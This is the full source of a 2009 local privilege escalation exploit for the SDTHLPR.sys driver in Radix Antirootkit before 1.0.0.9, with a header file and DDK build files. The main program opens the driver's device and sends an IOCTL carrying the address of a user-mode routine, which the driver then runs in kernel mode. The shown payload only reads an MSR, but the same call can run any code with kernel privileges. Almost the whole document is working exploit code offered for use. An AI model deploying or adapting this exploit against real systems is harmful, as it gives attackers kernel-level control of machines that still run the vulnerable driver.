|
-------------------------SdtHelper_Exp.c----------------------------
////////////////////////////////////////////////////////////////////////////////////
// +----------------------------------------------------------------------------+ //
// | | //
// | Usec.at - http://www.usec.at/ | //
// | | //
// | Affected Software: | //
// | Radix Antirootkit < 1.0.0.9 | //
// | | //
// | Affected Driver: | //
// | SDTHLPR.sys | //
// | | //
// | Local Privilege Escalation Exploit | //
// | For Educational Purposes Only ! | //
// | | //
// +----------------------------------------------------------------------------+ //
// | | //
// | NT Internals - http://www.ntinternals.org/ | //
// | alex ntinternals org | //
// | 21 August 2009 | //
// | | //
// | References: | //
// | Radix Antirootkit Multiple Privilege Escalation Vulnerabilities | //
// | NTIADV0903 - http://www.ntinternals.org/ntiadv0903/ntiadv0903.html | //
// | | //
// +----------------------------------------------------------------------------+ //
////////////////////////////////////////////////////////////////////////////////////
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include "SdtHelper_Exp.h"
#define IOCTL_CALL_RING0 0x002240C0
#define INPUT_BUFFER_LENGTH 0x08
#define IA32_SYSENTER_EIP 0x176
ULONG Ia32SysenterEip;
NTSTATUS Ring0ShellCode(ULONG Parameter1, ULONG Parameter2)
{
__asm
{
mov ecx, IA32_SYSENTER_EIP
sub edx, edx
rdmsr
mov Ia32SysenterEip, eax
}
return 0;
}
int __cdecl main(int argc, char **argv)
{
NTSTATUS NtStatus;
HANDLE DeviceHandle = NULL;
UNICODE_STRING DeviceName;
OBJECT_ATTRIBUTES ObjectAttributes;
IO_STATUS_BLOCK IoStatusBlock;
LARGE_INTEGER Interval;
ULONG InputBuffer[2];
///////////////////////////////////////////////////////////////////////////////////////////////
system("cls");
printf( " +----------------------------------------------------------------------------+\n"
" | |\n"
" | Usec.at - http://www.usec.at/ |\n"
" | |\n"
" | Affected Software: |\n"
" | Radix Antirootkit < 1.0.0.9 |\n"
" | |\n"
" | Affected Driver: |\n"
" | SDTHLPR.sys |\n"
" | |\n"
" | Local Privilege Escalation Exploit |\n"
" | For Educational Purposes Only ! |\n"
" | |\n"
" +----------------------------------------------------------------------------+\n"
" | |\n"
" | NT Internals - http://www.ntinternals.org/ |\n"
" | alex ntinternals org |\n"
" | 21 August 2009 |\n"
" | |\n"
" | References: |\n"
" | Radix Antirootkit Multiple Privilege Escalation Vulnerabilities |\n"
" | NTIADV0903 - http://www.ntinternals.org/ntiadv0903/ntiadv0903.html |\n"
" | |\n"
" +----------------------------------------------------------------------------+\n\n");
///////////////////////////////////////////////////////////////////////////////////////////////
RtlInitUnicodeString(&DeviceName, L"\\Device\\SdtHelper");
ObjectAttributes.Length = sizeof(OBJECT_ATTRIBUTES);
ObjectAttributes.RootDirectory = NULL;
ObjectAttributes.ObjectName = &DeviceName;
ObjectAttributes.Attributes = OBJ_CASE_INSENSITIVE;
ObjectAttributes.SecurityDescriptor = NULL;
ObjectAttributes.SecurityQualityOfService = NULL;
printf(" [+] Waiting for Device Handle...\n\n");
do
{
NtStatus = NtCreateFile(
&DeviceHandle, // FileHandle
FILE_READ_DATA | FILE_WRITE_DATA, // DesiredAccess
&ObjectAttributes, // ObjectAttributes
&IoStatusBlock, // IoStatusBlock
NULL, // AllocationSize OPTIONAL
0, // FileAttributes
FILE_SHARE_READ | FILE_SHARE_WRITE, // ShareAccess
FILE_OPEN_IF, // CreateDisposition
0, // CreateOptions
NULL, // EaBuffer OPTIONAL
0); // EaLength
/*
if(NtStatus)
{
printf(" [*] NtStatus of NtCreateFile - 0x%.8X\n", NtStatus);
return NtStatus;
}
*/
}
while (DeviceHandle == NULL);
RtlFreeUnicodeString(&DeviceName);
///////////////////////////////////////////////////////////////////////////////////////////////
Interval.LowPart = 0xFF676980;
Interval.HighPart = 0xFFFFFFFF;
printf(" [+] 3");
NtDelayExecution(FALSE, &Interval);
printf(" 2");
NtDelayExecution(FALSE, &Interval);
printf(" 1");
NtDelayExecution(FALSE, &Interval);
printf(" Hoop...\n\n");
NtDelayExecution(FALSE, &Interval);
InputBuffer[0] = (ULONG)Ring0ShellCode;
InputBuffer[1] = 0;
NtStatus = NtDeviceIoControlFile(
DeviceHandle,
NULL,
NULL,
NULL,
&IoStatusBlock,
IOCTL_CALL_RING0,
InputBuffer,
INPUT_BUFFER_LENGTH,
NULL,
0);
if(NtStatus)
{
printf(" [*] NtStatus of NtDeviceIoControlFile - 0x%.8X\n", NtStatus);
return NtStatus;
}
printf(" [+] IA32_SYSENTER_EIP (0x176) - 0x%.8X\n", Ia32SysenterEip);
NtStatus = NtClose(DeviceHandle);
if(NtStatus)
{
printf(" [*] NtStatus of NtClose - 0x%.8X\n", NtStatus);
return NtStatus;
}
return FALSE;
}
----------------------------SdtHelper_Exp.h---------------------------------------
#define IMP_VOID __declspec(dllimport) VOID __stdcall
#define IMP_SYSCALL __declspec(dllimport) NTSTATUS __stdcall
#define OBJ_CASE_INSENSITIVE 0x00000040
#define FILE_OPEN_IF 0x00000003
typedef ULONG NTSTATUS;
typedef struct _UNICODE_STRING
{
/* 0x00 */ USHORT Length;
/* 0x02 */ USHORT MaximumLength;
/* 0x04 */ PWSTR Buffer;
/* 0x08 */
}
UNICODE_STRING,
*PUNICODE_STRING,
**PPUNICODE_STRING;
typedef struct _OBJECT_ATTRIBUTES
{
/* 0x00 */ ULONG Length;
/* 0x04 */ HANDLE RootDirectory;
/* 0x08 */ PUNICODE_STRING ObjectName;
/* 0x0C */ ULONG Attributes;
/* 0x10 */ PSECURITY_DESCRIPTOR SecurityDescriptor;
/* 0x14 */ PSECURITY_QUALITY_OF_SERVICE SecurityQualityOfService;
/* 0x18 */
}
OBJECT_ATTRIBUTES,
*POBJECT_ATTRIBUTES,
**PPOBJECT_ATTRIBUTES;
typedef struct _IO_STATUS_BLOCK
{
union
{
/* 0x00 */ NTSTATUS Status;
/* 0x00 */ PVOID Pointer;
};
/* 0x04 */ ULONG Information;
/* 0x08 */
}
IO_STATUS_BLOCK,
*PIO_STATUS_BLOCK,
**PPIO_STATUS_BLOCK;
typedef VOID (NTAPI *PIO_APC_ROUTINE)
(
IN PVOID ApcContext,
IN PIO_STATUS_BLOCK IoStatusBlock,
IN ULONG Reserved
);
IMP_VOID RtlInitUnicodeString
(
IN OUT PUNICODE_STRING DestinationString,
IN PCWSTR SourceString
);
IMP_VOID RtlFreeUnicodeString
(
IN PUNICODE_STRING UnicodeString
);
IMP_SYSCALL NtCreateFile
(
OUT PHANDLE FileHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
OUT PIO_STATUS_BLOCK IoStatusBlock,
IN PLARGE_INTEGER AllocationSize OPTIONAL,
IN ULONG FileAttributes,
IN ULONG ShareAccess,
IN ULONG CreateDisposition,
IN ULONG CreateOptions,
IN PVOID EaBuffer OPTIONAL,
IN ULONG EaLength
);
IMP_SYSCALL NtDeviceIoControlFile
(
IN HANDLE FileHandle,
IN HANDLE Event OPTIONAL,
IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
IN PVOID ApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK IoStatusBlock,
IN ULONG IoControlCode,
IN PVOID InputBuffer OPTIONAL,
IN ULONG InputBufferLength,
OUT PVOID OutputBuffer OPTIONAL,
IN ULONG OutputBufferLength
);
IMP_SYSCALL NtDelayExecution
(
IN BOOLEAN Alertable,
IN PLARGE_INTEGER Interval
);
IMP_SYSCALL NtClose
(
IN HANDLE Handle
);
--------------------------------------sources----------------------------------------
TARGETNAME=SdtHelper_Exp
TARGETPATH=obj
TARGETTYPE=PROGRAM
SOURCES=SdtHelper_Exp.c
UMTYPE=console
UMBASE=0x00400000
TARGETLIBS=$(DDK_LIB_PATH)\ntdll.lib
----------------------------------------makefile-------------------------------
!INCLUDE $(NTMAKEENV)\makefile.def
|
推荐
评论(0条)
